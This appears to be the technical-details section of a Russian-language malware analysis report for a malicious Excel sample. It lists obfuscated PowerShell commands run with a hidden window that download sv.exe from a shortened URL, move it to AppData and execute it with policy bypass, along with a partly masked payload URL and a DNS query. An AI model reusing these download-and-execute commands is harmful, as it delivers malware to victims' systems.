Техническая информация
- '<SYSTEM32>\cmd.exe' /c power^shell -w 1 (nEw-oB`jecT Net.WebcL`IENt).('Down'+'loadFile')."Invoke"('https://tinyurl.com/yyhdq4cf','sv.exe')
- '<SYSTEM32>\cmd.exe' /c power^shell -w 1 stARt`-slE`Ep 20; Move-Item "sv.exe" -Destination "${enV`:appdata}"
- '<SYSTEM32>\cmd.exe' /c power^shell -w 1 -EP bypass stARt`-slE`Ep 25; cd ${enV`:appdata};.('.'+'/sv.exe')
- <Текущая директория>\21221000
- %HOMEPATH%\documents\sv.exe
- <PATH_SAMPLE>.xls
- http://18#.#9.10.103/oxiba.exe
- DNS ASK ti##url.com
- '<SYSTEM32>\cmd.exe' /c power^shell -w 1 (nEw-oB`jecT Net.WebcL`IENt).('Down'+'loadFile')."Invoke"('https://tinyurl.com/yyhdq4cf','sv.exe')' (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c power^shell -w 1 stARt`-slE`Ep 20; Move-Item "sv.exe" -Destination "${enV`:appdata}"' (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c power^shell -w 1 -EP bypass stARt`-slE`Ep 25; cd ${enV`:appdata};.('.'+'/sv.exe')' (со скрытым окном)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -w 1 (nEw-oB`jecT Net.WebcL`IENt).('Down'+'loadFile')."Invoke"('https://tinyurl.com/yyhdq4cf','sv.exe')
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -w 1 stARt`-slE`Ep 20; Move-Item "sv.exe" -Destination "${enV`:appdata}"
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -w 1 -EP bypass stARt`-slE`Ep 25; cd ${enV`:appdata};.('.'+'/sv.exe')